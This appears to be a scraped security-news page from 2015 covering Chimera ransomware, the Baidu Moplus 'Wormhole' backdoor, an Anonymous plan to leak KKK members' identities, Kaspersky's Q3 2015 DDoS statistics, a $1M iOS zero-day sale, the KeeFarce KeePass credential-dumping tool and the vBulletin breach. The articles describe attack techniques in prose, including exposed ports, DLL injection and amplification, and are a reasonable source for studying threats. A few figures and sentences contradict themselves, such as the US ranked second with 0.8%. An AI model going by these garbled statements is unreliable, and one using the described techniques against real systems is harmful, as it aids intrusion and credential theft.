Nové zařízení je určeno pro menší firmy se zaměstnanci, kteří pracují buď na jednom místě, nebo jsou rozmístěni v menších týmech v různých lokalitách.

Podle výrobce chrání a zabezpečuje síť, uživatele i data a navíc prý přispívá i k vyšší produktivitě zaměstnanců.

NG100 lze monitorovat a přistupovat k němu kdykoli a z jakéhokoli zařízení prostřednictvím centralizované webové správy MyKerio.

Cena zařízení činí 14 688 Kč, cena ročního Software Maintenance je stanovená na 4 590 Kč.

Chimera, a new strain of ransomware in the wild

According to a German website, there is a new strain of ransomware dubbed Chimera that also threatens to publish personal data on the Internet.
A new strain of ransomware is targeting German companies, it is named Chimera and this time crooks don’t limit their extortion scheme to the file encrypting, they are also threatening victims to release sensitive data on the Internet.
The attack vector exploited by Chimera is the email, bogus emails are sent to the company employees to offer them a job or to apply for a job position. The malicious emails include a link to a Dropbox address, the messages try to trick employees into visiting the link claiming additional information.

When victims click on the link they download the Chimera ransomware that once installed encrypts user data present on the local system and on network connected drives. The ransomware displays victims the following message:

chimera ransomware

Victims need to pay 2.45 Bitcoin (around €630/$694) to decrypt the files. If the victims will not pay the ransom, the crooks will publish stolen data along with their name, on the Internet.

The researchers at Botfrei, who first spotted the malware, confirmed that here is no evidence that cyber criminals have leaked online the stolen data.

“There is so far no evidence or information whether the criminals have stolen from affected systems or are already published on the Internet personal information!” states a blog post published on Botfrei.
It is likely that the criminals have no ability to exfiltrate the encrypted data, that is expected to have a significant volume.

“Another problem with the edentulous threat posed by this ransomware is that the implication of a threatened personal information disclosure would assume that someone is combing through the files for that personal information,” explained the InfoSec analyst Bob Covello.

“This is a level of involvement that most ransomware criminals do not want to broach. Ransomware is designed for a quick payday for the criminals with little interaction with the victim.”

The primary defense against ransomware is to have the an updated backup of most important documents.

More than 100 Million Android users at risk due to the Baidu Moplus SDK

A vulnerability known as Wormhole affects the Baidu Moplus SDK and potentially exposes more than 100 Million users to cyber attacks.
The Moplus software development kit (SDK) distributed by the Chinese Search Engine Baidu includes a functionality that can be exploited to gain access to the user’s device. The backdoor-like feature potentially exposes more than 100 Million Android users to cyber attacks.

“A vulnerability known as Wormhole that reportedly affected the software development kit (SDK), Moplus by Baidu is making waves due to the severity of the impact once successfully exploited. The said vulnerability was discovered by WooYun.og, a vulnerability reporting platform in China.” states a blog post published by TrendMicro. “However, as our investigation on this security bug unfolded, we found out that the Moplus SDK has backdoor functionalities that are not necessarily due or related to a vulnerability. “

The Wormhole vulnerability in the Moplus SDK could be exploited by hackers to open an unsecured and unauthenticated HTTP server connection on the user’s device, and this connection is established in the background without the user’s knowledge.

The Moplus SDK automatically installs the Web server when a mobile app developed with the SDK is launched on the device. The server doesn’t implement authentication and can accept requests from any source. The server receives requests on both 6259 or 40310 ports, this means that an attacker can easily locate it by searching on a shared network the open ports.

“… the notion that it is vulnerability-related when in actual this SDK has backdoor routines such as pushing phishing pages, inserting arbitrary contacts, sending fake SMS, uploading local files to remote servers, and installing any applications to the Android devices without user’s authorization. ” continues the post.

The Moplus SDK is already used by more than 14,000 Android apps, nearly 4,000 of them are developed by Baidu. These apps have been already downloaded by more than 100 Million Android users.

Baidu moplus SDK

The Moplus SDK allows an attacker to perform many actions including:

Send SMS messages
ake phone calls
Get mobile phone details
Add new contacts
Get a list of local apps
Download files on the device
Upload files from the device
Silently install other apps (if the phone is rooted)
Push Web pages
Get phone’s geo-location, and many more

moplus SDK malicious featuresThe experts highlighted that the Wormhole flaw in the Moplus SDK is very dangerous because it is potentially easier to exploit than the Stagefright flaw. In this case in fact the hacker just need to locate a vulnerable device exposing the open ports.
The researchers at Trend Micro have confirmed the existence in the wild of a specific malware, dubbed ANDROIDOS_WORMHOLE.HRXA, which exploit the Wormhole in Moplus SDK.
Researchers reported the issue to Baidu and Google, the Chinese Giant has already pushed a partial fix for the issue in a new release of the Moplus SDK.

Be aware, the new version of SDK doesn’t completely solve all problems, for example the HTTP server remains exposed online.

A few days ago, another Chinese company has caught distributing malicious SDK which included spying features. According to according to Palo Alto Networks, nearly 18,000 Android Applications built using the Taomike SDK have been found to include SMS Stealing Library.

Anonymous Hackers to Leak 1000 of KKK Members Details on Million Mask March (Nov 5, 2015)

The Online Hacktivist group Anonymous announced it plans to reveal the identities of about 1,000 Ku Klux Klan (KKK) members on 5th November, the day of the Global Protest movement known as the Million Mask March.
Million Mask March, where protesters don Guy Fawkes masks in hundreds of cities around the world, and march together against the corrupt Governments and corporations.
Ku Klux Klan (KKK) is classified as a White Supremacist Racist group by the Anti-Defamation League and the Southern Poverty Law Center, allegedly having total 5,000 to 8,000 members.
It was founded after the Civil War by former Confederate soldiers to fight against the reforms imposed by the North during Reconstruction.
“We've gained access to yet another KKK Twitter account. Using the info obtained, we will be revealing about 1000 Klan member identities.”, Anonymous Hackers tweeted last week.
The list of 1000 KKK Members, to be released on 5th November, apparently includes the names of US Politicians, according to the hackers affiliated with Anonymous — Operation KKK.
"You operate much more like terrorists, and you should be recognized as such. You are terrorists that hide your identities beneath sheets and infiltrate society on every level,” the hacker collective said.
"The privacy of the Ku Klux Klan no longer exists in cyberspace. You've had blood on your hands for nearly 200 years."
Yesterday another group of Anonymous hackers, not members of Operation KKK, published the first batch of information (unverified) on Pastebin, which includes total 57 phone numbers and 23 email addresses allegedly belonging to KKK members, along with names of 4 U.S. Senators and 5 City Mayors.
However, Hackers affiliated with Operation KKK denies any connection with the above leak and promises to release its own 1000 KKK Members list on the 5th Nov.

Backdoor in Baidu Android SDK Puts 100 Million Devices at Risk

The China's Google-like Search Engine Baidu is offering a software development kit (SDK) that contains functionality that can be abused to give backdoor-like access to a user's device, potentially exposing around 100 Million Android users to malicious hackers.
The SDK in question is Moplus, which may not be directly available to the public but has already made its way into more than 14,000 Android apps, of which around 4,000 are actually created by Baidu.
Overall, more than 100 Million Android users, who have downloaded these apps on their smartphones, are in danger.
Security researchers from Trend Micro have discovered a vulnerability in the Moplus SDK, called Wormhole, that allows attackers to launch an unsecured and unauthenticated HTTP server connection on affected devices, which works silently in the background, without the user's knowledge.
Also Read: More than 26 Android Phone Models Shipped with Pre-Installed Spyware
This unsecured server does not use authentication and can accept requests from anyone on the Internet. Though the server is controlled by the attacker, who can send requests to a particular port of this hidden HTTP server to execute malicious commands.
Malicious Functionalities of Wormhole
Currently, the researchers have identified that the SDK is using the port 6259 or 40310 to perform malicious activities on affected Android devices, which includes:
Send SMS messages
Make phone calls
Get mobile phone details
Add new contacts
Get a list of local apps
Download files on the device
Upload files from the device
Silently install other apps (if the phone is rooted)
Push Web pages
Get phone's geo-location, and many more
Since the SDK automatically installs the Web server when a Moplus SDK app is opened, hackers just need to scan a mobile network for port 6259 or 40310, thereby finding vulnerable devices they can abuse.
Also Read: Android Malware Can Spy On You Even When Your Mobile Is Off
Wormhole is More Dangerous than Stagefright
The vulnerability, according to researchers, is potentially easier to exploit than the Stagefright flaw, as Wormhole doesn't require social engineering to infect an unsuspecting user.
Trend Micro has also found at least one malware strain (detected as ANDROIDOS_WORMHOLE.HRXA) in the wild that takes advantage of Wormhole in Moplus SDK.
Researchers informed both Baidu as well as Google of the vulnerability.
As a result, Baidu has just pushed a partial fix for the problem by releasing a new version of the SDK that removed some of the SDK's functionality, but not all. The HTTP server remains online and active; however, Baidu assured its users that no backdoor exists now.
Must Read: Stagefright Bug 2.0 — One Billion Android SmartPhones Vulnerable to Hacking
This isn't the first time a Chinese company has caught distributing malicious SDK. Just a few days ago, the Taomike SDK – one of the biggest mobile ad solutions in China – was caught secretly spying on users' SMS messages and uploading them to a server in China.
The same malicious functionality was also discovered two weeks back in another SDK developed by Youmi; that affected 256 iOS apps, which were caught using private APIs to collect users private data. However, Apple eventually banned those apps from its App Store.

Kaspersky DDoS Intelligence Report Q3 2015
3.11.2015 Zdroj: Kaspersky

Download PDF version

Q3 events

Of all the Q3 2015 events in the world of DDoS attacks and the tools used to launch them, we picked out those that, in our opinion, best illustrate the main trends behind the evolution of these threats.

DDoS attacks targeting financial organizations for the purpose of extortion;
new techniques to increase the intensity of attacks by manipulating web pages;
active development of Linux-based botnets for DDoS attacks.
Attacks on financial organizations

In Q3 2015, there was increased activity by the cybercriminal group “DD4BC” responsible for a number of attacks on major banking organizations around the world. The group has been targeting banks, media groups and gaming companies since September, threatening to take down their customer websites unless they pay a ransom. The owner of the targeted resource is asked to pay between 25 and 200 bitcoins ($6,500 – $52,500), or have their servers disabled. Some of the first victims included organizations in Australia, New Zealand and Switzerland, while a warning was received by major financial institutions in Hong Kong. The Bank of China and the Bank of East Asia also reported that they were targeted by illegal activity. In the third quarter, a number of Russian financial institutions also received notifications from cybercriminals asking for a specific sum in cryptocurrency to terminate an attack.

Unusual attack scenario

The company CloudFlare reported a DDoS attack with an unusual scenario. A site belonging to one of CloudFlare’s customers was being subjected to an attack made up of 275,000 HTTP requests per second. Of particular interest was the fact that the attackers made use of malicious JavaScript embedded in adverts. An iframe with a malicious advert that contained the JavaScript was run on the browsers of lots of users, resulting in their workstations sending XHR requests to the victim. Experts believe that these malicious ads can also display some legitimate applications.

XOR DDoS bot activity

The specialists at Akamai Technologies witnessed growth in the capacity of a DDoS botnet consisting of Linux-based computers whose victims were mostly Asian sites belonging to educational institutions and gaming communities. A distinctive feature of the bot is the use of XOR-encryption both in the malicious program and for communication with the C&C servers. At the same time, in order to self-propagate the bot brute-forces passwords to the root account in Linux systems. Linux is often used as a server operating system, which means that the server also has the channel and computing resources that the attackers can use to launch DDoS attacks. Using SYN and DNS floods, this botnet has been successfully carrying out attacks with a capacity of 109-179 Gbps.

The proportion of DDoS attacks from Linux-based botnets in Q3 2015 was 45.6% #KLReport
According to Kaspersky Lab data, the botnets from Linux-based servers infected by the XOR DDoS bot actively attacked resources located in China.

DDoS availability

On the one hand, the software that is used for DDoS attacks is becoming more complicated; on the other hand, the tools for DDoS attacks are becoming more freely available and easier to use. As a result, setting up and launching a DDoS attack no longer requires any special technical knowledge. A fairly competent criminal could easily unleash a powerful attack.

This fact is confirmed by attacks on the educational portal of the Republic of Tatarstan carried out by students attempting to block communication between teachers and parents. Throughout the year the attackers repeatedly tried to bring down the portal, which was protected by Kaspersky DDoS Protection. All their attempts were unsuccessful, but their persistence did succeed in attracting the attention of Kaspersky Lab’s experts.

The longest DDoS attack in Q3 2015 lasted for 320 hours #KLReport
The availability and ease of use of the tools for DDoS attacks has resulted in the range of targets growing. It is generally accepted that DDoS attacks are mainly focused on financial institutions, government agencies, businesses and the media. Now, however, any resource that has attracted the ire of an unscrupulous web user could be subjected to a DDoS attack – even an educational portal.

Statistics of botnet-assisted DDoS attacks


The DDoS Intelligence system (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

In this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

In Q3 2015, 91.6% of resources, targeted by DDoS attacks, were located in 10 countries #KLReport
The geographical distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets that were detected and analyzed by Kaspersky Lab. It should also be highlighted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q3 Summary

In Q3 2015, botnet-assisted DDoS attacks targeted victims in 79 countries around the world.
91.6% of targeted resources were located in 10 countries.
The largest numbers of DDoS attacks targeted victims in China, the US and South Korea.
The longest DDoS attack in Q3 2015 lasted for 320 hours (or 13.3 days).
SYN DDoS, TCP DDoS and HTTP DDoS were the most common DDoS attack scenarios.
Linux-based bots are actively used by cybercriminals; the proportion of DDoS attacks from Linux-based botnets in the third quarter was 45.6%.
Geography of attacks

In Q3, the targets of DDoS attacks were located in 79 countries around the world. 91.6% of attacked resources were located in 10 countries.

Kaspersky DDoS Intelligence Report Q3 2015

Distribution of unique DDoS attack targets by country, Q3 vs Q2 2015

China still leads the Top 10 ranking: in Q3 of 2015, 34.5% of DDoS attack targets were located there, an increase of 4.6 percentage points (p.p.) on the previous quarter. The US came second with 0.8%. South Korea remained in third place (17.7%) although its share increased considerably – by 7.9 p.p.

The Netherlands (1.1%) re-entered the Top 10. A newcomer to the rating was Japan whose share accounted for 1.3% of all attacked resources. Germany (1.0%) and Hong Kong (0.9%) left the Top 10.

If we look at the number of reported attacks, 92.3% of all attacks (an increase of 14.7 p.p. on Q2) had targets within the same Top 10 countries:

Kaspersky DDoS Intelligence Report Q3 2015

Distribution of DDoS attack by countries, Q3 vs Q2 2015

In the third quarter, China (37.9%), the US (22.7%) and South Korea (14.1%) remained in the leading three places. The Netherlands (1.1%) and Japan (1.3%) pushed France (0.9%) and Hong Kong (0.9%) out of the Top 10 in terms of the number of attacks. The biggest increase in the proportion of DDoS attacks in Q3 was observed in the US – the share of attacks grew by 5.4 p.p.

In Q3 2015, the largest numbers of DDoS attacks targeted victims in China, the US & South Korea #KLReport
The figures for the leading three countries in both rankings – the number of attacks and the number of targets – increased by more than they did for the other Top 10 countries. The continued leadership of China and the US in the rankings is due to cheap web hosting in those countries, which explains why so many targeted web resources are located there.

The absolute leader in terms of the number of attacks was an IP address allegedly belonging to a data center in Hong Kong: throughout the quarter it was attacked 22 times.

Changes in DDoS attack numbers

In Q3 2015, DDoS activity was distributed unevenly, with two peaks: the first fell in mid-July, the second in late September. The quietest period was from early August to mid-September.

Kaspersky DDoS Intelligence Report Q3 2015

Number of DDoS attacks over time* in Q3 2015.

* DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.

The peak number of attacks in one day was 1344, recorded on 24 September.

Tuesday was the most active day of the week in terms of DDoS attacks.

Kaspersky DDoS Intelligence Report Q3 2015

Distribution of DDoS attack numbers by days of the week

The fact that Tuesday leads is probably due to a dramatic rise in the number of DDoS attacks on that day of the week on 14 July and on 22 September. Particularly active on those two days were botnets from Linux-based servers infected by the XOR DDoS bot that attacked resources in China.

Types and duration of DDoS attacks

99.3% of DDoS targets in Q3 2015 (vs. 98.2% in Q2) were attacked by bots belonging to one family.

In only 0.7% of all cases cybercriminals launched attacks using bots from two different families (or the clients used the services of several attack agents). In 0.2% of cases, three or more bots were used.

In Q3 2015, SYN DDoS (51.7%) remained the most popular attack method. TCP DDoS (16.4%) and HTTP DDOS (14.9%) were second and third respectively. ICMP-DDoS, whose contribution doubled over the last two quarters and accounted for 5.1%, was fourth.


The distribution of DDoS attacks by types

Once again, most attacks lasted no longer than 24 hours in Q3 2015. However, the number of attacks that lasted a week or longer increased considerably.

Kaspersky DDoS Intelligence Report Q3 2015

The distribution of DDoS attacks by duration (hours)

The longest DDoS attack in the previous quarter lasted for 205 hours (8.5 days); in Q3, this record was beaten by an attack that lasted 320 hours (13.3 days).

C&C servers and botnet types

In Q3 2015, South Korea took the lead in terms of the number of C&C servers located on its territory; its share grew from 34% to 56.6%. Noticeably, in South Korea this quarter the number of C&C servers that control Nitol bots increased significantly. Nitol began to use Dynamic DNS services more actively, in particular, no-ip.org and codns.com. As mentioned above, the percentage of DDoS attacks targeting resources located in South Korea also increased.

The proportion of C&C servers located in the US and China dropped significantly – from 21% to 12.4% and from 14% to 6.9% respectively.

Kaspersky DDoS Intelligence Report Q3 2015

Distribution of botnet C&C servers by countries in Q3 2015

The activity of Windows and Linux botnets continued to fluctuate. After the previous quarter’s reduction in the share of Linux-based botnets, in Q3 they regained ground – the proportion of attacks by Linux bots grew from 37.6% to 45.6%.

Kaspersky DDoS Intelligence Report Q3 2015

Correlation between attacks launched from Windows and Linux botnets

The increase in the proportion of Linux bot activity was most probably down to insufficient protection for Linux-based machines and, quite importantly, their higher Internet speeds. This makes Linux more attractive to cybercriminals despite the relative complexity in developing, acquiring and exploiting Linux bots.

Attacks on banks

The third quarter of 2015 saw the return of DDoS extortionists to the cybercrime scene. A number of major banking institutions in a variety of countries were targeted by DDoS attacks that were then followed by demands for a large payment in cryptocurrency to stop the attack. This particular aspect of the attacks suggests they are the work of the cybercriminal group DD4BC (Distributed Denial of Service for Bitcoin), which demands bitcoin ransoms.

It appears the group has now reached Russia, where a number of financial institutions were also attacked. Some of the Russian banks that were targeted were either protected by Kaspersky DDoS Protection or quickly connected to the service as soon as the DDoS attacks began. This meant they avoided any damage and the banks’ websites and online banking systems continued to function smoothly.

Kaspersky Lab registered a wave of lengthy DDoS attacks on the online banking systems of eight well-known financial institutions, with some banks repeatedly targeted.

SYN DDoS, TCP DDoS and HTTP DDoS were the most common DDoS attack scenarios in Q3 2015 #KLReport
For all attacks the cybercriminals used a complex combination of amplification attacks that disable online resource with minimal effort.

Three types of attack were used to overload the channel: NTP amplification, SSDP amplification and RIPv1 amplification which reached 40 Gbps. In some cases, the attacks were supplemented by a HTTPS flood attack that reached 150 Mbps from a botnet with about 2,000 attacking hosts.

The attacks lasted from one to four hours.

The attackers not only demanded a bitcoin ransom but also threatened the banks with unprecedented terabit attacks. However, these threats have not been implemented in practice.

We can assume that the peak attack parameters registered at the end of September were the attackers’ maximum – Kaspersky Lab experts recorded this particular aggregate capacity in simultaneous attacks on several banks.

Unfortunately, this does mean the power of attacks will not increase in the future.


The correlation between the number of attacks launched from Windows and Linux botnets marks an interesting trend, with criminals starting to actively use botnets from infected servers. There are several reasons for this.

Firstly, servers have a significantly bigger Internet channel than domestic machines, making it possible to organize powerful attacks with only a few C&C servers.

Secondly, the level of server protection is not always very high, leaving them vulnerable to hacking. If security patches are not regularly installed on the server, it quickly becomes an easy prey for cybercriminals: it does not take them long to discover such servers and exploit any known vulnerabilities. Then there is the expanded arsenal of available exploits that have appeared after a number of vulnerabilities were detected in open-source products such as exploits for the ghost vulnerability, which is still in use.

Thirdly, the power of a server botnet can be increased by renting additional servers.

In these circumstances, timely installation of security patches on servers becomes critical. For the owners of web resources, effective protection from DDoS attacks originating from server botnets is strongly recommended.

Kim Dotcom's Decentralized Internet — For You, Powered By You

Imagine the internet that would offer you to communicate privately with anyone else without censorship, safe from the prying eyes of surveillance authorities….
… Decentralized, Encrypted, Peer-to-Peer Supported and especially a non-IP Address based Internet.
Yeah, a New Private Internet that would be harder to get Hacked.
This Internet is a dream of all Internet users today and, of course, Kim Dotcom – the Famous Internet entrepreneur who introduced legendary Megaupload and MEGA file sharing services to the World.
Kim Dotcom announced plans to start his very own private internet at the beginning of this year and has now revealed more details about MegaNet — a decentralized, non-IP based network that would share data via "Blockchains," the technology behind Bitcoins.
On Thursday, Dotcom remotely addressed a conference in Sydney, Australia, where he explained how MegaNet will utilize the power of mobile phones and laptops to operate.
How will MegaNet work?
MegaNet will work on non-IP-based Internet that will use blockchains and new protocols to communicate and exchange data while using the Internet's existing physical infrastructure.
MegaNet will actually rely on the unused processing power of people's smartphones and laptops.
Users with MegaNet on their smartphone would be able to donate their device's processing capability and storage bandwidth when they actually aren't using it.
Dotcom believes that once the service has enough subscribers, this would become an incredibly large amount of power, so much so that it can operate MegaNet.
MegaNet – The Internet For the People, From the People
"If you have a 100 Million smartphones that have the MegaNet app installed we'll have more online storage capacity, calculating power and bandwidth than the top 10 largest websites in the world combined [together], and that is the power of MegaNet," Dotcom said.
"Over the years with these new devices and capacity especially mobile bandwidth capacity, there will be no limitations."
So in short, MegaNet is a decentralized Internet, as Dotcom says, "from the people, for the people."
Encryption Used Won't be Cracked Even by Supercomputers
MegaNet will still use using the Internet's existing physical infrastructure people use today, but will add an extra layer of encryption running through all communications.
Dotcom did not reveal too much detail about the encryption he will be going to utilize, but said that he is going to harness very long keys, systems that won't be "reverse engineered or cracked by any supercomputer."
Difficult to Invade Privacy of Users
Most importantly, MegaNet will make it difficult for law enforcement agencies to invade its users privacy, as the entire network is fully encrypted.
"If you don't have IP addresses you can not hack the server, you can not execute denial of service [DDoS] attacks on gaming services or websites," Dotcom said from New Zealand, where he's currently awaiting the result of his extradition trial.
The millionaire is confident that MegaNet would be an excellent technology solution that will keep you secure over the Internet, without the requirement of any new infrastructure for users’ privacy.
With the launch of MegaNet, which is expected sometime in 2016, Dotcom hopes 100 Million users to sign-up within the first year of its launch.

Hackers win $1 million bounty for iOS 9 remote hack

A team of hackers has received a million-dollar payout for disclosing a iOS zero-day vulnerability that could allow an attacker to remotely hack any Phone.
Bad news for the Apple users, a team of hackers have received a million-dollar payout for disclosing an iOS zero-day vulnerability that could allow an attacker to remotely hack any Phone running the latest version of iOS, i.e. iOS 9.

The unknown group of hackers has sold a zero-day vulnerability to Zerodium, the Exploit trade company controlled by the security firm Vupen which is specialized in Buys and Sells zero-day exploits.

In September Zerodium offered a million dollar prize to any person that finds unknown, unpatched bug in iOS 9 with the main purpose to jailbreak iThings.

The company announced the payment of a working exploit being able to do remote code execution on an iOS device via safari/chrome or by SMS/MMS, it also added that the zero-day exploit/jailbreak “must lead to and allow a remote, privileged, and persistent installation of an arbitrary app (e.g. Cydia) on a fully updated iOS 9 device.”

The working zero-day exploit can combine other vulnerabilities to perform a jailbreak without the need of a reboot or a connection to an external device.

“The whole exploitation/jailbreak process should be achievable remotely, reliably, silently, and without requiring any user interaction except visiting a web page or reading a SMS/MMS (attack vectors such as physical access, Bluetooth, NFC, or baseband are not eligible for the Million Dollar iOS 9 Bug Bounty. ZERODIUM may, at its sole discretion, make a distinct offer to acquire such attack vectors.).”

The exploit/jailbreak must support and work reliably on the following devices (32-bit and 64-bit when applicable):
– iPhone 6s / iPhone 6s Plus / iPhone 6 / iPhone 6 Plus
– iPhone 5 / iPhone 5c / iPhone 5s
– iPad Air 2 / iPad Air / iPad (4rd generation) / iPad (3th generation) / iPad mini 4 / iPad mini 2

Now it seems that someone has found the way to remotely hack the new IpPhone.

As I have explained several times the untethered jailbreaks allows users to gain root access to the operating system of the Apple devices allowing to bypass all the security features designed by Apple.

Jailbreaking a device is possible to install and execute software that could not otherwise be installed or run on that device, or to remove pre-installed software that could not otherwise be uninstalled.

In the attack scenario described by the group of hackers, they are able to exploit a zero-day in order to perform a remote browser-based jailbreak. Experts speculate that the new zero-day works on the new iPhone 6 and iPhone 5 models, iPad Air 2 and Air, iPad 4 and 3, and the iPad mini 4 and iPad mini 2.

The bug hunters have found three flaws in iOS 9.x and Google Chrome that lead them to remotely hack any iPhone running iOS 9.x.

“No software other than iOS really deserves such a high bug bounty,” founder Chaouki Bekrar told Vulture South. “Our bounty required much more work than a classic jailbreak as it had to be remote and browser-based, so this required two to three additional zero-days compared to a public jailbreak.” “The exploit chain includes a number of vulnerabilities affecting both Google Chrome browser and iOS, and bypassing almost all mitigations in place.”

According to Bekrar, the winners submitted the zero-day exploit a few hours before the contest closed, there was also another team of hacker that reported a partial jailbreak and could gain a partial reward.

Actually the experts at Zerodium are testing the zero-day exploit, obviously only the Zerodium clients will have the access to the remote browser-based untethered jailbreaking, the company confirmed that the zero-day will not be disclosed in public.

“We will first report the vulnerabilities to our customers, and we may later report them to Apple,” Bekrar added.
Who are the clients of companies like Zerodium and Vupen? Which is the final use of such kind of zero-day exploits?

The exploits could be acquired by totalitarian governments that could use them for surveillance and to track opponents. An attacker could use them to install any application that could allow to track individuals, including spyware and surveillance software.

Apple users have no choice, the must hope that security experts at Apple will find the zero-day bug and will fix it before someone could exploit it in the wild.

KeeFarce Hacking tool steals encrypted credentials from KeePass password manager

KeeFarce is a recently released hacking tool that swipes encrypted credentials from the KeePass password manager through the DLL injection.
A password manager is considered one of the most secure tools to archive strong passwords in a computer. Unfortunately, the presence of a malware on the PC can expose passwords even if they are stored with a password manager.

A hacking tool recently released subbed KeeFarce is able to silently decrypts all usernames, passwords, and notes stored by the popular KeePass password manager and transcribes them information into a file.

“Indeed, if the operating system is owned, then it’s game over,” explained to Ars, Denis Andzakovic researcher at Security Assessment and the creator of KeeFarce.

Hackers can execute the KeeFarce tool on a computer where a logged in user has unlocked the KeePass database, under this condition, KeeFarce is able to decrypt the entire password archive.

KeeFarce hacking tool KeePass

“The point of KeeFarce is to actually obtain the contents of the password database. Say a penetration tester has achieved domain admin access to a network but also wants to obtain access to networking hardware, non-domain infrastructure, etcetera. The tester can compromise a sysadmin’s machine and use the tool to swipe the password details from the KeePass instance the sysadmin has open.” added Andzakovic.

KeeFarce is able to bypass the process memory protection implemented by the KeePass password manager, it extracts the passwords from the database by injecting a dynamic link library code. The injected DLL is able to invoke an existing function in KeePass that exports the contents of a currently open database to an external file in CSV format. The extracted data is in clear text and includes user names, passwords, notes, and URLs.

The DLL injection is a common process to allow programs to interoperate, but it could be abused to insert malicious code in the context of a running application.

KeeFarce works against KeePass 2.28, 2.29 and 2.30 running on Windows 8.1 (32 and 64 bit), it should also work on older Windows machines.

Tools like KeeFarce reminds us that password managers could represent a single point of failure that could be exploited with severe repercussion by hackers.

Similar tools could be used to hack also other commercial password managers.

Hackers WIN $1 Million Bounty for Remotely Hacking latest iOS 9 iPhone

Well, here's some terrible news for all Apple iOS users…
Someone just found an iOS zero-day vulnerability that could allow an attacker to remotely hack your iPhone running the latest version of iOS, i.e. iOS 9.
Yes, an unknown group of hackers has sold a zero-day vulnerability to Zerodium, a startup by French-based company Vupen that Buys and Sells zero-day exploits.
And Guess what, in How much?
$1,000,000. Yes, $1 Million.
Last month, a Bug bounty challenge was announced by Zerodium for finding a hack that must allow an attacker to remotely compromise a non-jailbroken Apple device through:
A web page on Safari or Chrome browser,
In-app browsing action, or
Text message or MMS.

Zerodium's Founder Chaouki Bekrar confirmed on Twitter that an unnamed group of hackers has won this $1 Million Bounty for sufficiently submitting a remote browser-based iOS 9.1/9.2b Jailbreak (untethered) Exploit.
NO More Fun. It's Serious Threat to iOS Users
For those who are not aware, this remote Jailbreak is not really cool.
Why? Because…
The only difference between a malicious cyber attack and Jailbreak is – Payload, the code that executes on target system after exploitation.
A traditional jailbreak process is usually used to deploy an alternative App Store, but in hands of Hackers or law enforcement agencies, the same exploit can allow them to install any app they want with full privileges i.e. Spyware, Malware or Surveillance software.
Moreover, We know that Zerodium's parent company Vupen develops hacking techniques based on those bugs and typically sells them to multiple government customers.
Also Read: For Better Privacy & Security, Change these iOS 9 Settings Immediately.
So, the chances are high that the firm will resell the newly discovered and undisclosed remote iOS zero-day jailbreak exploit to its clients, which are said to include Spy agencies, Governments, and Law enforcement agencies.
Your Turn, Apple…
Let's see how much time Apple security team will now take to find out this open zero-day bug in its software and close the doors before it gets too late.

Meet The World's First Person Who Hacked His Body to Implant a Bitcoin Payment CHIP

hacker Bitcoin mining chips
Hackers are now going crazy and trying new ways in Biohacking.
Until now, we have seen a hacker who implanted a small NFC chip in his hand in order to hack Android smartphones and bypass almost all security measures.
However, now the level of craziness has gone to a whole new level.
A Swedish hacker has devised a neat trick that makes him able to buy groceries or transfer money between bank accounts by just waving his hand.
Yes, you heard that right. Patric Lanhed, a software developer at DigitasLBi, implanted a small NFC (Near Field Communications) chip with the private key to his Bitcoin wallet under his skin.
So How Does the Trick Work?
So, while sending Bitcoin payment from one digital wallet to another, he just has to wave his hands against an NFC chip reader that will scan the data, and a custom software will confirm the authenticity of the key, triggering the money transfer.
A proof-of-concept video demonstration by Patric and his acquaintance Juanjo Tara Ortiz, an engineer at Arduino, shows a successful Bitcoin payment from one wallet to another. The transaction, what the duo claim, is…
The World's First "Bio-Payment" — a way to send and receive money using:
Data stored inside a human body
A custom software app built on top of a Bitcoin wallet’s developer API.
Bitcoin-related NFC technology has been around for a while, but this chip implant approach takes the potential of this technology to the next level.

$1 BILLION invested in Bitcoin Firms So Far
Major companies, including American Express (AXP), MasterCard, Bain Capital and the New York Stock Exchange, have invested overall, a record-breaking $1 Billion into Bitcoin-related tech startups.
The Bitcoin technology promises to transform the way we trade stocks, get paid, send money to each other, and much more. It has come up as an effective way to stop fraud.
So, one can see the future of Bitcoin payments using the bio-payment system.
The Future of Bio-Payments
Bitcoin is just the beginning of their research, as the duo believe that they can turn this payment transfer system into a bio-payment terminal system to be used in stores.
So in near future, the custom software developed by the duo will have the capability to allow people to store different types of data, including Bitcoin, on their chips.
They claim the applications besides a bio-payment will include:
Medical records
ID papers like an embedded Passport
Travel documents
ICE (In Case of Emergency) tags
Data authentication for consumer applications like vehicle entry, home security, computer authorization, and many more
VCard exchange over a phone and lot more applications
So be ready, as the age of Bio-Payments has arrived.

The official website of the popular vBulletin forum has been hacked

The website of the vBulletin forum software is down for maintenance following a data breach that exposed personal information of hundreds of thousands users
On Sunday, the vBulletin official website has been hacked by an attacker using the moniker “Coldzer0.” The website has been defaced and the vBulletin forum was displaying the message “Hacked by Coldzer0.”

At the time I was writing the website is down for maintenance and there are no details on the attack, according to DataBreaches.net, vBulletin, Foxit Software forums have been hacked by Coldzer0 that has stolen hundreds of thousands of users’ records.

The hacker published screenshots that show he managed to upload a shell to the vBulletin forum website and accessed user personal information, including user IDs, names, email addresses, security questions and answers, and password salts).

vBulletin forum hacked 2

I suggest users to change their passwords as soon as possible, especially if they share the same credentials across other websites.

DataBreaches.net has linked the online moniker “Coldzer0” to the malware analyst and security researcher Mohamed Osama. The Egyptian expert Osama has promptly removed all references to the vBulletin attack from his social media accounts. Osama has also deleted his personal website, coldroot.com, after his name was in the headlines due to the attack to vBulletin.

vBulletin forum hacked 3

The hacker claims to have exploited a zero-day vulnerability affecting the vBulletin forum to hack the popular application.

It is not the first time that hackers target vBulletin, in 2013 experts at Security firm Imperva discovered that more than 35000 websites based on vBulletin CMS were hacked exploiting a known vulnerability.

IT threat evolution in Q3 2015
2.11.2015 Zdroj: Kaspersky

Download PDF version

Q3 in figures

According to KSN data, Kaspersky Lab solutions detected and repelled a total of 235,415,870 malicious attacks from online resources located all over the world.
75,408,543 unique URLs were recognized as malicious by web antivirus components.
